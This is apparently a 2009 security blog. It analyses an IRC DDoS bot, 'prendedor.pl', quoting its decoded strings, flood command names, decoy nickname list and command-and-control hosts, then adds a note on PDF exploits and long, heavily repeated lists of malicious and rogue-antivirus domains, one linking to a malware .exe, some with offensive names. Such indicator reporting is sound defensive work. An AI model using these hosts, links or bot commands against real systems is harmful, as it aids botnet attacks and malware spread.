$string6 = decode_base64($string1);
$string7 = decode_base64($string2);
$string8 = decode_base64($string3);
$string9 = decode_base64($string4);
$string10 = decode_base64($string5);
"ZGFya2x5" --> darkly
"Y0t6" -->cKz
"cGFuYQ==" -->pana
"RnVzaW9u" -->Fusion
"SXowbg==" -->Iz0n
Sigh.....tire....... looking for the "prendedor.pl" file ??
Search from giant search engine Google
You may find out that many website contains this files, maybe they even don't know their server controlled by bad guys to perform DDoS to target machines. :(
Similar information about this botnet can be find at http://web17.webbpro.de/index.php?page=infobox-ru-botnet
This file called "prendedor.pl"
First, try to gather from where source from ?
http://125.163.251.219/har ??
Your IP Address: 125.163.251.2
IP Address Hostname: 2.subnet125-163-251.speedy.telkom.net.id
IP Country: Indonesia
IP Country Code: IDN
IP Continent: Asia
IP Region: Yogyakarta
Guessed City: Yogyakarta
IP Latitude: -7.7828
IP Longitude: 110.3608
ISP Provider: PT. Telecomunikasi Indonesia
kraton.penggingcity.com = 94.23.114.15 (GERMANY)
Your IP Address: 94.23.114.15
IP Address Hostname: 94.23.114.15
IP Country: Germany
IP Country Code: DEU
IP Continent: Europe
IP Region:
Guessed City:
IP Latitude: 51
IP Longitude: 9
ISP Provider: Connecting Life
irc.racrew.us =
82.146.54.69
Your IP Address: 82.146.54.69
IP Address Hostname: admin.indovds.com
IP Country: Russian Federation
IP Country Code: RUS
IP Continent: Europe
IP Region:
Guessed City:
IP Latitude: 60
IP Longitude: 100
ISP Provider: ISPsystem at NAC
174.34.131.70
Your IP Address: 174.34.131.70
IP Address Hostname: el8.com.br
IP Country: United States
IP Country Code: USA
IP Continent: North America
IP Region: Ohio
Guessed City: Cleveland
IP Latitude: 41.3861
IP Longitude: -81.7102
ISP Provider: JinxShells
209.20.65.73
Your IP Address: 209.20.65.73
IP Address Hostname: 209-20-65-73.slicehost.net
IP Country: United States
IP Country Code: USA
IP Continent: North America
IP Region: Missouri
Guessed City: Saint Louis
IP Latitude: 38.6446
IP Longitude: -90.2533
ISP Provider: Slicehost LLC
74.3.40.137
Your IP Address: 74.3.40.137
IP Address Hostname: h-74-3-40-137-static.lsanca54.covad.net
IP Country: United States
IP Country Code: USA
IP Continent: North America
IP Region: California
Guessed City: Culver City
IP Latitude: 34.0202
IP Longitude: -118.3928
ISP Provider: Covad Communications
Few keywords were found like these....
!target NICK (Especifica novo alvo)\n";
!ctcpflood (Envia flood ctcp)\n";
!dccflood (Envia flood dcc)\n";
!noticeflood (Envia flood de notice)\n";
!msgflood (Envia flood de mensagens)\n";
!hop #chan msg (Entra e sai de um canal deixando msg)\n";
From the scripts, the noted was writted by
#
# PIXEL ELITE RAQUERS POWER RANGERS BUBLEGUM
# desde 2001 ouvindo backstreet boys
#
#
and the IRC "irc.racrew.us" will be used for sure by who claimed as "racrew"
Attacker will pretend with different type of names in IRC channel and below are the nickname used :
@nickname = ("Abdulrazak","Ackerman","Adams","Addison","Adelstein","Adibe","Adorno","Ahlers","Alavi","Alcorn","Alda", "Aleks","Allison","Alongi","Altavilla","Altenberger","Altenhofen","Amaral","Amatangelo","Ameer","Amsden","Anand","Andel", "Ando","Andrelus","Andron","Anfinrud","Ansley","Anthony","Antos","Arbia","Arduini","Arellano","Aristotle","Arjas","Arky","Atkins", "Augustus","Aurelius","Axelrod","Axworthy","Ayiemba","Aykroyd","Ayling","Azima","Bachmuth","Backus","Bady","Baglivo","Bagnold", "Bailar","Bakanowsky","Baleja","Ballatori","Ballew","Baltz","Banta","Barabesi","Barajas","Baranczak","Baranowska","Barberi","Barbetti", "Barneson","Barnett","Barriola","Barry","Bartholomew","Bartolome","Bartoo","Basavappa","Bashevis","Batchelder","Baumiller","Bayles","Bayo", "Beacon","Beal","Bean","Beckman","Beder","Bedford","Behenna","Belanger","Belaoussof","Belfer","Belin-Collart","Bellavance","Bellhouse", "Bellini","Belloc","Benedict-Dye","Bergson","Berke-Jenkins","Bernardo", "Bernassola","Bernston","Berrizbeitia","Betti","Beynart","Biagioli", "Bickel","Binion","Bir","Bisema","Bisho","Blackbourn","Blackwell","Blagg","Blakemore","Blanke","Bliss","Blizard","Bloch","Bloembergen", "Bloemhof","Bloxham","Blyth","Bolger","Bolick","Bollinger","Bologna","Boner","Bonham","Boniface","Bontempo","Book","Bookbinder","Boone", "Boorstin","Borack","Borden","Bossi","Bothman","Botosh","Boudin","Boudrot","Bourneuf","Bowers","Boxer","Boyajian","Boyes","Boyland", "Boym", "Boyne","Bracalente","Bradac","Bradach","Brecht","Breed","Brenan","Brennan","Brewer","Brewer","Bridgeman","Bridges","Brinton", "Britz","Broca","Brook","Brzycki","Buchan","Budding","Bullard","Bunton","Burden","Burdzy","Burke","Burridge","Busetta","Byatt","Byerly", "Byrd","Cage","Calnan","Cammelli","Cammilleri","Canley","Capanni","Caperton","Capocaccia","Capodilupo","Cappuccio","Capursi","Caratozzolo", "Carayannopoulos","Carlin","Carlos","Carlyle","Carmichael","Caroti","Carper","Cartmill","Cascio","Case","Caspar","Castelda","Cavanagh", "Cavell","Ceniceros","Cerioli","Chapman","Charles","Cheang","Cherry","Chervinsky","Chiassino","Chien","Childress","Childs","Chinipardaz", "Chinman","Christenson","Christian","Christiano","Christie","Christopher","Chu","Chupasko","Church","Ciampaglia","Cicero","Cifarelli", "Claffey","Clancy","Clark","Clement","Clifton","Clow","Coblenz","Coito","Coldren","Colella","Collard","Collis","Compton","Compton", "Comstock","Concino","Condodina","Connors","Corey","Cornish","Cosmides","Counter","Coutaux","Crawford","Crocker","Croshaw","Croxen", "Croxton","Cui","Currier","Cutler","Cvek","Cyders","daSilva","Daldalian","Daly","D'Ambra","Danieli","Dante","Dapice","D'arcangelo","Das", "Dasgupta","Daskalu","David","Dawkins","DeGennaro","DeLaPena","del'Enclos","deRousse","Debroff","Dees","Defeciani","Delattre","Deleon-Rendon", "Delger","Dell'acqua","Deming","Dempster","Demusz","Denault","Denham","Denison","Desombre","Deutsch","D'fini","Dicks","Diefenbach","Difabio", "Difronzo","Dilworth","Dionysius","Dirksen","Dockery","Doherty","Donahue","Donner","Doonan","Dore","Dorf","Dosi","Doty","Doug","Dowsland", "Drinker","D'souza","Duffin","Durrett","Dussault","Dwyer","Eardley","Ebeling","Eckel","Edley","Edner","Edward","Eickenhorst","Eliasson", "Elmendorf","Elmerick","Elvis","Encinas","Enyeart","Eppling","Erbach","Erdman","Erdos","Erez","Espinoza","Estes","Etter","Euripides", "Everett","Fabbris","Fagan","Faioes","Falco-Acosta","Falorsi","Faris","Farone","Farren","Fasso'","Fates","Feigenbaum","Fejzo","Feldman", "Fernald","Fernandes","Ferrante","Ferriell","Feuer","Fido","Field","Fink","Finkelstein","Finnegan","Fiorina","Fisk","Fitzmaurice","Flier", "Flores","Folks","Forester","Fortes","Fortier","Fossey","Fossi","Francisco","Franklin-Kenea","Franz","Frazier-Davis","Freid","Freundlich", "Fried","Friedland","Frisken","Frowiss","Fryberger","Frye","Fujii-Abe","Fuller","Furth","Fusaro","Gabrielli","Gaggiotti","Galeotti","Galwey", "Gambini","Garfield","Garman","Garonna","Geller","Gemberling","Georgi","Gerrett","Ghorai","Gibbens","Gibson","Gilbert","Gili","Gill","Gillispie", "Gist","Gleason","Glegg","Glendon","Goldfarb","Goncalves","Good","Goodearl","Goody","Gozzi","Gravell","Greenberg","Greenfeld","Griffiths", "Grigoletto","Grummell","Gruner","Gruppe","Guenthart","Gunn","Guo","Ha","Haar","Hackman","Hackshaw","Haley","Halkias","Hallowell","Halpert", "Hambarzumjan","Hamer","Hammerness","Hand","Hanssen","Harding","Hargraves","Harlow","Harrigan","Hartman","Hartmann","Hartnett","Harwell", "Haviaras","Hawkes","Hayes","Haynes","Hazlewood","Heermans","Heft","Heiland","Hellman","Hellmiss","Helprin","Hemphill","Henery","Henrichs", "Hernandez","Herrera","Hester","Heubert","Heyeck","Himmelfarb","Hind","Hirst","Hitchcock","Hoang","Hock","Hoffer","Hoffman","Hokanson","Hokoda", "Holmes","Holoien","Holter","Holway","Holzman","Hooker","Hopkins","Horsley","Hoshida","Hostage","Hottle","Howard","Hoy","Huey","Huidekoper", "Hungerford","Huntington","Hupp","Hurtubise","Hutchings","Hyde","Iaquinta","Ichikawa","Igarashi","Inamura","Inniss","Isaac","Isaievych","Isbill", "Isserman","Iyer","Jacenko","Jackson","Jagers","Jagger","Jagoe","Jain","Jamil","Janjigian","Jarnagin","Jarrell","Jay","Jeffers","Jellis", "Jenkins","Jespersen","Jewett","Johannesson","Johannsen","Johns","Jolly","Jorgensen","Jucks","Juliano","Julious","Kabbash","Kaboolian","Kafadar", "Kalbfleisch","Kaligian","Kalil","Kalinowski","Kalman","Kamel","Kangis","Karpouzes","Kassower","Kasten","Kawachi","Kee","Keenan","Keepper", "Keith","Kelker","Kelsey","Kempton","Kemsley","Kendall","Kerry","Keul","Khong","Kimmel","Kimmett","Kimura","Kindall","Kinsley","Kippenberger", "Kirscht","Kittridge","Kleckner","Kleiman","Kleinfelder","Klemperer","Kling","Klinkenborg","Klint","Knuff","Kobrick","Koch","Kohn","Koivumaki", "Kommer","Koniaris","Konrad","Kool","Korzybski","Kotter","Kovaks","Kraemer","Krailo","Krasney","Kraus","Kroemer","Krysiak","Kuenzli","Kumar", "Kusman","Kuwabara","La","Labunka","Lafler","Laing","Lallemant","Landes","Lankes","Lantieri","Lanzit","Laserna","Lashley","Lawless","Lecar", "Lecce","Leclercq","Leite","Lenard","Sofia","Lesser","Lessi","Liakos","Lidano","Liem","Light","Lightfoot","Lim","Linares","Linda","Linder", "Line","Linehan","Linzee","Lippmann","Lipponen","Little","Litvak","Livernash","Livi","Livolsi","Lizardo","Locatelli","Longworth","Loss","Loveman", "Lowenstein","Loza","Lubin","Lucas","Luciano","Luczkow","Luecke","Lunetta","Luoma","Lussier","Lutcavage","Luzader","Ma","Maccormac","Macdonald", "Maceachern","Macintyre","Mackenney","MacMillan","Macy","Madigan","Maggio","Mahony","Maier","Maine-Hershey","Maisano","Malatesta","Maller", "Malova","Progho","Mandel","Manganiello","Mantovan","March","Marchbanks","Marcus","Margalit","Margetts","Marques","Martinez","Martochio", "Marton","Marubini","Mass","Matalka","Matarazzo","Matsukata","Mattson","Mauzy","May","Mazzali","Mazziotta","Mcbride","Mccaffery","Mccall", "Mcclearn","Mcdowell","Mcelroy","McFadden","Mcghee","Mcgoldrick","McIlroy","Mcintosh","Mcdonald","Mclane","Mclaren","Mcnealy","Mcnulty", "Meccariello","Memisoglu","Menzies","Merikoski","Merlani","Merminod","Merseth","Merz","Metelka","Metropolis","Meurer","Michelman","Middle", "Mieher","Mills","Minh","Mini","Minichiello","Gonzalez","Mitropoulos","Mittal","Mocroft","Modestino","Moeller","Mohr","Moiamedi","Monque","Montilio", "MooreDeCh.","Morani","Moreton","Morrison","Morrow","Mortimer","Mosher","Mosler","Mostafavi","Motooka","Mudarri","Muello","Mugnai","Mulkern", "Mulroy","Mumford","Mussachio","Naddeo","Napolitano","Nardi","Nardone","Naviaux","Nayduch","Nelson","Nenna","Nesci","Neuman","Newfeld","Newlin", "Ng","Ni","Nickerson","Nickoloff","Nisenson","Nitabach","Notman","Nuzum","Ocougne","Ogata","Oh","O'hagan","Oldford","Olsen","Olson","Olszewski", "O'malley","Oman","O'meara","Opel","Oray","Orfield","Orsi","Ospina","Ostrowski","Ottaviani","Otten","Ouchida","Ovid","PaesDealmeida","Paine", "Palayoor","Palepu","Pallara","Palmitesta","Panadero","Panizzon","Pantilla","Paoletti","Parmeggiani","Parris","Partridge","Pascucci","Patefield", "Patrick","Pattullo","Pavetti","Pavlon","Pawloski","Paynter","Peabody","Pearlberg","Pederson","Peishel","Penny","Pereira","Perko","Perlak", "Perlman","Perna","Perone","Perrimon","Peters","Petruzello","Pettibone","Pettit","Pfister","Pilbeam","Pinot","Plancon","Plant","Plasket","Plous", "Po","Pocobene","Poincaire","Pointer","Poirier","Polak","Polanyi","Politis","Poma","Poolman","Powers","Presper","Preucel","Prevost","Pritchard", "Pritz","Proietti","Prothrow-Stith","Puccia","Pugh","Pynchon","Quaday","Quetin","Rabe","Rabkin","Radeke","Rajagopalan","Raney","Rangan","Rankin", "Rapple","Rayport","Redden-Tyler","Reedquist","Cunningham","Reinold","Remak","Renick","Repetto","Resnik","Rhea","Richmond","Rielly","Rindos", "Rineer","Rish","Rivera","Robinson","Rocha","Roesler","Rogers","Ronen","Row","Royal","Ru","Ruan","Ruderman","Ruescher","Rush","Ryu","Sabatello", "Sadler","Safire","Sahu","Sali","Samson","Sanchez-Ramirez","Sanna","Sapers","Sarin","Sartore","Sase","Satin","Satta","Satterthwaite","Sawtell", "Sayied","Scarponi","Scepan","Scharf","Scharlemann","Scheiner","Schiano","Schifini","Schilling","Schmitt","Schossberger","Schuman","Schutte", "Schuyler","Schwan","Schwickrath","Scovel","Scudder","Seaton","Seeber","Segal","Sekler","Selvage","Sen","Sennett","Seterdahl","Sexton", "Seyfert","Shaikh","Shakis","Shankland","Shanley","Shar","Shatrov","Shavelson","Shea","Sheats","Shepherd","Sheppard","Shepstone","Shesko","Shia", "Shibata","Shimon","Siesto","Sigalot","Sigini","Signa","Silverman","Silvetti","Sinsabaugh","Sirilli","Sites","Skane","Skerry","Skoda","Sloan", "Slowe","Smilow","Sniffen","Snodgrass","Socolow","Solon","Somers","Sommariva","Sorabella","Sorg","Sottak","Soukup","Soule","Soultanian","Spanier", "Sparrow","Spaulding","Speizer","Spence","Sperber","Spicer","Spiegelhalter","Spiliotis","Spinrad","StMartin","Stalvey","Stam","Stang","Stassinopolus", "States","Statlender","Stefani","Steiner","Stephanian","Stepniewska","Stewart-Oaten","Stiepock","Stillwell","Stock","Stockton","Stockwell","Stolzenberg", "Stonich","Storer","Stott","Strange","Strauch","Streiff","Stringer","Sullivan","Sumner","Suo","Surdam","Sweeting","Sweetser","Swindle","Tagiuri", "Tai", "Talaugon","Tambiah","Tandler","Tanowitz","Tatar","Taveras","Tawn","Tcherepnin","Teague","Temes","Temmer","Tenney","Terracini","Than", "Thavaneswaran","Theodos","Thibault","Thisted","Thomsen","Throop","Tierney","Till","Timmons","Tofallis","Tollestrup","Tolls","Tolman","Tomford", "Toomer","Topulos","Torresi","Torske","Towler","Toye","Traebert","Trenga","Trewin","Tringali","Troiani","Troy","Truss","Tsiatis","Tsomides","Tsukurov", "Tuck","Tudge","Tukan","Turano","Turek","Tuttle","Twells","Tzamarias","Ullman","Untermeyer","Upsdell","Urban","Urdang-Brown","Usdan","Uzuner", "Vacca","Waite","Valberg","Valencia","Wales","Wallenberg","Walter","Brontok","VanZwet","Vandenberg","Vanheeckeren","Warshafsky","Wasowska","Vasquez", "Waugh","Weighart","Weingarten","Weinhaus","Weissbourd","Weissman","Velasquez","Welles","Welsh","Wengret","Venne","Verghese","Wescott","Wetzel", "Whately","Whilton","White","Whitla","Whittaker","Viana","Viano","Wiedersheim","Wiener","Viens","Vignola","Wilder","Wilhelm","Wilk","Wilkin","Wilkinson", "Villarreal","Willstatter","Wilson","Vitali","Viviani","Voigt","Wolk","VonHoffman","Woo","Wooden","Woods","Woods-Powell","Vorhaus","Votey","Yacono", "Yamane","Yankee","Yarchuk","Yates","Ybarra","Yedidia");
Below are the few string used decode used MIME::Base64
$string1 = "ZGFya2x5";
$string2 = "Y0t6";
$string3 = "cGFuYQ==";
$string4 = "RnVzaW9u";
$string5 = "SXowbg==";
$string6 = decode_base64($string1);
$string7 = decode_base64($string2);
$string8 = decode_base64($string3);
$string9 = decode_base64($string4);
$string10 = decode_base64($string5);
"ZGFya2x5" --> darkly
"Y0t6" -->cKz
"cGFuYQ==" -->pana
"RnVzaW9u" -->Fusion
"SXowbg==" -->Iz0n
Sigh.....tire....... looking for the "prendedor.pl" file ??
Search from giant search engine Google
You may find out that many website contains this files, maybe they even don't know their server controlled by bad guys to perform DDoS to target machines. :(
Similar information about this botnet can be find at http://web17.webbpro.de/index.php?page=infobox-ru-botnet
Wednesday, June 3, 2009
PDF exploits become more complex to obfuscate
No doubt that exploit PDF vector still a threat that get attentioned from few security vendors attentions. PDF exploit exist since 2007 in wild and the amount of PDF exploits increased from time to time. According to Symantec Global Internet Security Threat Report 2008 recently, web-based attack related to PDF exploit sit rank 2nd or 11 percent from Top Web-Based Attack. Other than that, web browser plug-in vulnerability also contribute numbers of web-based PDF exploit increased. F-Secure also proved that PDF exploit attack also increased from 28.61% 2008 compare to 48.87% 2009. The numbers for PDF exploit seems will be continue increased for this year since few PDF generator tool available and ready to use such as Metasploits and etc.
PDF malware generator will produce more complex obfuscate code for coming days and it will challenging vendors security analysis skills and times.
Below are the few graphs related to Adobe Reader 7, 8 and 9 impact from year 2003 to 2009. This information obtained from Secunia. Thanks Secunia !
Another good website related to PDF Exploits:
1. http://www.sophos.com/blogs/sophoslabs//?p=4600
2. http://securitylabs.websense.com/content/Blogs/3411.aspx
3. http://www.sophos.com/blogs/sophoslabs/v/post/1221
4. http://www.web2secure.com/2009/05/analysis-exploit-adobe-pdf-utilprintf.html
5. http://www.f-secure.com/weblog/archives/00001687.html
6. http://www.f-secure.com/weblog/archives/00001676.html
PDF malware generator will produce more complex obfuscate code for coming days and it will challenging vendors security analysis skills and times.
Below are the few graphs related to Adobe Reader 7, 8 and 9 impact from year 2003 to 2009. This information obtained from Secunia. Thanks Secunia !
Another good website related to PDF Exploits:
1. http://www.sophos.com/blogs/sophoslabs//?p=4600
2. http://securitylabs.websense.com/content/Blogs/3411.aspx
3. http://www.sophos.com/blogs/sophoslabs/v/post/1221
4. http://www.web2secure.com/2009/05/analysis-exploit-adobe-pdf-utilprintf.html
5. http://www.f-secure.com/weblog/archives/00001687.html
6. http://www.f-secure.com/weblog/archives/00001676.html
Malicious URLs * 03-June-09*
IP Address:60.191.239.181
Domain lists:
www.seryusay.cn
blackaringo.ru
caleyo.ru
cofxcd.tifpeyax.cn
himxidun.cn
moylubov.ru
quickgrand.com
tqfi.lonizoyi.ru
wqnul.qawgegal.cn
www.119lw.com
www.jettiton.cn
www.joslurom.cn
www.koqlomet.cn
www.libsorod.cn
www.lowlyclear.com
www.paper800.com
www.paper999.com
www.shu1000.com
www.sowgugob.cn
www.sugarass.ru
www.wipyexoj.cn
www.xoxnelow.cn
www.yarlakov.cn
oohi.qawgegal.cn
aditic.bydarante.ru
agatha.juhfaqic.cn
22-55.cn
3fady.flairmine.com
alice.virrotip.cn
bapkajac.cn
firmplum.com
flairmine.com
grnaw.bapkajac.cn
hudwuhew.cn
kuqwotef.cn
primechic.com
senhulon.cn
sucaku.zeqwekam.cn
thkd.xobferap.cn
virrotip.cn
wole.xipcojuy.cn
www.tvoixacda.ru
xipcojuy.cn
xobferap.cn
xwa.kuqwotef.cn
zotrizuj.cn
aditic.bydarante.ru
agatha.juhfaqic.cn
alexandra.yolbaqem.cn
blackaringo.ru
caleyo.ru
cofxcd.tifpeyax.cn
ecybqh.liqxetij.cn
gokzavok.cn
himxidun.cn
maypopuc.cn
moylubov.ru
quickgrand.com
sobyepiv.cn
tqfi.lonizoyi.ru
wqnul.qawgegal.cn
www.119lw.com
www.jettiton.cn
www.joslurom.cn
www.koqlomet.cn
www.libsorod.cn
www.lowlyclear.com
www.paper800.com
www.paper999.com
www.shu1000.com
www.sowgugob.cn
www.sugarass.ru
www.wipyexoj.cn
www.xoxnelow.cn
www.yarlakov.cn
ifolj.hoymufon.cn
vasy.wojjazer.cn
ury.jotnayeg.cn
IP Address:58.17.3.41
Domain lists:
qxieaq.olesej.ru
www.supegirl.ru
www.tumnemom.cn
www.wumsativ.cn
www.zocdixup.cn
agnes.gejzozoy.cn
aileen.seqwipul.cn
audrey.fiqruxem.cn
agnes.gulrulah.cn
IP Address:203.93.208.86
Domain lists:
adrienne.maypopuc.cn
alexandra.zikmigob.cn
cwwzrnodtd.rechasas.cn
liffoxaw.cn
lurvikex.cn
oohi.qawgegal.cn
qdrrfk.nabpulef.cn
rdwdsaf.vunsiqey.cn
tifpeyax.cn
www.ciqkoray.cn
www.gudosac.ru
www.qiqwejay.cn
www.sugyuwig.cn
www.virreqim.cn
www.wepwoloj.cn
www.wickiron.cn
www.wofroxip.cn
www.yiqfatir.cn
yuclaret.cn
ifolj.hoymufon.cn
vasy.wojjazer.cn
ury.jotnayeg.cn
IP Address:58.17.3.41
Domain lists:
agnes.gejzozoy.cn
agnes.gulrulah.cn
aileen.seqwipul.cn
alma.virrotip.cn
audrey.fiqruxem.cn
qxieaq.olesej.ru
www.supegirl.ru
www.tumnemom.cn
www.wumsativ.cn
www.zocdixup.cn
IP Address:203.93.208.86
Domain lists:
adrienne.maypopuc.cn
aimee.pafwilug.cn
alexandra.zikmigob.cn
cwwzrnodtd.rechasas.cn
liffoxaw.cn
lurvikex.cn
oohi.qawgegal.cn
qdrrfk.nabpulef.cn
rdwdsaf.vunsiqey.cn
tifpeyax.cn
www.ciqkoray.cn
www.gudosac.ru
www.qiqwejay.cn
www.sugyuwig.cn
www.virreqim.cn
www.wepwoloj.cn
www.wickiron.cn
www.wofroxip.cn
www.yiqfatir.cn
yuclaret.cn
agnes.gejzozoy.cn
agnes.gulrulah.cn
aileen.seqwipul.cn
alma.virrotip.cn
audrey.fiqruxem.cn
audrey.maypopuc.cn
hubnayeq.cn
qxieaq.olesej.ru
vyvqw.mimsijix.cn
www.supegirl.ru
www.tumnemom.cn
www.wumsativ.cn
www.zocdixup.cn
ifolj.hoymufon.cn
vasy.wojjazer.cn
ury.jotnayeg.cn
IP Address:58.17.3.41
Domain lists:
agnes.gejzozoy.cn
agnes.gulrulah.cn
aileen.seqwipul.cn
alma.virrotip.cn
audrey.fiqruxem.cn
audrey.maypopuc.cn
qxieaq.olesej.ru
www.supegirl.ru
www.tumnemom.cn
www.wumsativ.cn
www.zocdixup.cn
IP Address:60.191.239.181
Domain lists:
aditic.bydarante.ru
alexandra.yolbaqem.cn
blackaringo.ru
caleyo.ru
cofxcd.tifpeyax.cn
himxidun.cn
maypopuc.cn
moylubov.ru
quickgrand.com
tqfi.lonizoyi.ru
wqnul.qawgegal.cn
www.119lw.com
www.jettiton.cn
www.joslurom.cn
www.koqlomet.cn
www.libsorod.cn
www.lowlyclear.com
www.paper800.com
www.paper999.com
www.shu1000.com
www.sowgugob.cn
www.sugarass.ru
www.wipyexoj.cn
www.xoxnelow.cn
www.yarlakov.cn
Note:If you think the information benefit to you, click on advertisement to support me for domain fees.
Domain lists:
www.seryusay.cn
blackaringo.ru
caleyo.ru
cofxcd.tifpeyax.cn
himxidun.cn
moylubov.ru
quickgrand.com
tqfi.lonizoyi.ru
wqnul.qawgegal.cn
www.119lw.com
www.jettiton.cn
www.joslurom.cn
www.koqlomet.cn
www.libsorod.cn
www.lowlyclear.com
www.paper800.com
www.paper999.com
www.shu1000.com
www.sowgugob.cn
www.sugarass.ru
www.wipyexoj.cn
www.xoxnelow.cn
www.yarlakov.cn
oohi.qawgegal.cn
aditic.bydarante.ru
agatha.juhfaqic.cn
22-55.cn
3fady.flairmine.com
alice.virrotip.cn
bapkajac.cn
firmplum.com
flairmine.com
grnaw.bapkajac.cn
hudwuhew.cn
kuqwotef.cn
primechic.com
senhulon.cn
sucaku.zeqwekam.cn
thkd.xobferap.cn
virrotip.cn
wole.xipcojuy.cn
www.tvoixacda.ru
xipcojuy.cn
xobferap.cn
xwa.kuqwotef.cn
zotrizuj.cn
aditic.bydarante.ru
agatha.juhfaqic.cn
alexandra.yolbaqem.cn
blackaringo.ru
caleyo.ru
cofxcd.tifpeyax.cn
ecybqh.liqxetij.cn
gokzavok.cn
himxidun.cn
maypopuc.cn
moylubov.ru
quickgrand.com
sobyepiv.cn
tqfi.lonizoyi.ru
wqnul.qawgegal.cn
www.119lw.com
www.jettiton.cn
www.joslurom.cn
www.koqlomet.cn
www.libsorod.cn
www.lowlyclear.com
www.paper800.com
www.paper999.com
www.shu1000.com
www.sowgugob.cn
www.sugarass.ru
www.wipyexoj.cn
www.xoxnelow.cn
www.yarlakov.cn
ifolj.hoymufon.cn
vasy.wojjazer.cn
ury.jotnayeg.cn
IP Address:58.17.3.41
Domain lists:
qxieaq.olesej.ru
www.supegirl.ru
www.tumnemom.cn
www.wumsativ.cn
www.zocdixup.cn
agnes.gejzozoy.cn
aileen.seqwipul.cn
audrey.fiqruxem.cn
agnes.gulrulah.cn
IP Address:203.93.208.86
Domain lists:
adrienne.maypopuc.cn
alexandra.zikmigob.cn
cwwzrnodtd.rechasas.cn
liffoxaw.cn
lurvikex.cn
oohi.qawgegal.cn
qdrrfk.nabpulef.cn
rdwdsaf.vunsiqey.cn
tifpeyax.cn
www.ciqkoray.cn
www.gudosac.ru
www.qiqwejay.cn
www.sugyuwig.cn
www.virreqim.cn
www.wepwoloj.cn
www.wickiron.cn
www.wofroxip.cn
www.yiqfatir.cn
yuclaret.cn
ifolj.hoymufon.cn
vasy.wojjazer.cn
ury.jotnayeg.cn
IP Address:58.17.3.41
Domain lists:
agnes.gejzozoy.cn
agnes.gulrulah.cn
aileen.seqwipul.cn
alma.virrotip.cn
audrey.fiqruxem.cn
qxieaq.olesej.ru
www.supegirl.ru
www.tumnemom.cn
www.wumsativ.cn
www.zocdixup.cn
IP Address:203.93.208.86
Domain lists:
adrienne.maypopuc.cn
aimee.pafwilug.cn
alexandra.zikmigob.cn
cwwzrnodtd.rechasas.cn
liffoxaw.cn
lurvikex.cn
oohi.qawgegal.cn
qdrrfk.nabpulef.cn
rdwdsaf.vunsiqey.cn
tifpeyax.cn
www.ciqkoray.cn
www.gudosac.ru
www.qiqwejay.cn
www.sugyuwig.cn
www.virreqim.cn
www.wepwoloj.cn
www.wickiron.cn
www.wofroxip.cn
www.yiqfatir.cn
yuclaret.cn
agnes.gejzozoy.cn
agnes.gulrulah.cn
aileen.seqwipul.cn
alma.virrotip.cn
audrey.fiqruxem.cn
audrey.maypopuc.cn
hubnayeq.cn
qxieaq.olesej.ru
vyvqw.mimsijix.cn
www.supegirl.ru
www.tumnemom.cn
www.wumsativ.cn
www.zocdixup.cn
ifolj.hoymufon.cn
vasy.wojjazer.cn
ury.jotnayeg.cn
IP Address:58.17.3.41
Domain lists:
agnes.gejzozoy.cn
agnes.gulrulah.cn
aileen.seqwipul.cn
alma.virrotip.cn
audrey.fiqruxem.cn
audrey.maypopuc.cn
qxieaq.olesej.ru
www.supegirl.ru
www.tumnemom.cn
www.wumsativ.cn
www.zocdixup.cn
IP Address:60.191.239.181
Domain lists:
aditic.bydarante.ru
alexandra.yolbaqem.cn
blackaringo.ru
caleyo.ru
cofxcd.tifpeyax.cn
himxidun.cn
maypopuc.cn
moylubov.ru
quickgrand.com
tqfi.lonizoyi.ru
wqnul.qawgegal.cn
www.119lw.com
www.jettiton.cn
www.joslurom.cn
www.koqlomet.cn
www.libsorod.cn
www.lowlyclear.com
www.paper800.com
www.paper999.com
www.shu1000.com
www.sowgugob.cn
www.sugarass.ru
www.wipyexoj.cn
www.xoxnelow.cn
www.yarlakov.cn
Note:If you think the information benefit to you, click on advertisement to support me for domain fees.
Tuesday, June 2, 2009
Rogue Antivirus - 02 June 09
IP address 209.216.193.100
Domain lists:
registry-cleaner-2009.com
internet-explorer-cleaner.com
registrycleanerpro.org
IP address 78.129.166.166
Domain lists:
first-antivirus.com
xmovies-central.com
IP address 194.165.4.77
Domain lists:
loved-online-tube.com/scan --> http://tubepornolive.com/codec/.exe
Truepornmovies.com
loved-online-tube.com
loyal-porno.com
tubeontvgl.com
youngsters.ru
IP address 64.202.189.170
Domain lists:
youngsexmovies.com
xxxsummerstorm.com
xxxhotporn.info
www.thepenisstop.com
www.thehomebusinessexecutive.net
www.sexyknittersclub.com
www.sextus.com
www.movies4sex.com
www.pimpstrong.org
www.phonesexpranks.com
www.pimptext.com
www.inthemideast200gethiveverydaygetwisecondomise.info
www.inthemideast68000gothivin2006getwisecondomize.info
www.inthemideast200gothiveverydayin2006useacondom.info
www.inafrica24peopledieofaidsevery5minutesbewisecondomise.info
www.howadultareyou.com
www.giftslinksexchange.com
ksexradio.com
porngp.com
www.dontbesillyputacondomonyourwilly.info
www.crossfithardcore.com
www.azsexoffender.org
www.azsexoffender.com
mydaughtersfuckinganigga.com
sexywidget.com
sexycamilla.com
sexydesi.co.uk
sexandthecitymovieblog.com
pornhost.net
housewifeporn.org
internationalsexguide.com
hpronline.org
herfirstcreampie.com
fetishnewsnetwork.com
e-fucked.com
bigpenispillsstore.com
affairsexposed.com
clean-windows-vista.com
Note:If you think the information benefit to you, click on advertisement to support me for domain fees.
Domain lists:
registry-cleaner-2009.com
internet-explorer-cleaner.com
registrycleanerpro.org
IP address 78.129.166.166
Domain lists:
first-antivirus.com
xmovies-central.com
IP address 194.165.4.77
Domain lists:
loved-online-tube.com/scan --> http://tubepornolive.com/codec/.exe
Truepornmovies.com
loved-online-tube.com
loyal-porno.com
tubeontvgl.com
youngsters.ru
IP address 64.202.189.170
Domain lists:
youngsexmovies.com
xxxsummerstorm.com
xxxhotporn.info
www.thepenisstop.com
www.thehomebusinessexecutive.net
www.sexyknittersclub.com
www.sextus.com
www.movies4sex.com
www.pimpstrong.org
www.phonesexpranks.com
www.pimptext.com
www.inthemideast200gethiveverydaygetwisecondomise.info
www.inthemideast68000gothivin2006getwisecondomize.info
www.inthemideast200gothiveverydayin2006useacondom.info
www.inafrica24peopledieofaidsevery5minutesbewisecondomise.info
www.howadultareyou.com
www.giftslinksexchange.com
ksexradio.com
porngp.com
www.dontbesillyputacondomonyourwilly.info
www.crossfithardcore.com
www.azsexoffender.org
www.azsexoffender.com
mydaughtersfuckinganigga.com
sexywidget.com
sexycamilla.com
sexydesi.co.uk
sexandthecitymovieblog.com
pornhost.net
housewifeporn.org
internationalsexguide.com
hpronline.org
herfirstcreampie.com
fetishnewsnetwork.com
e-fucked.com
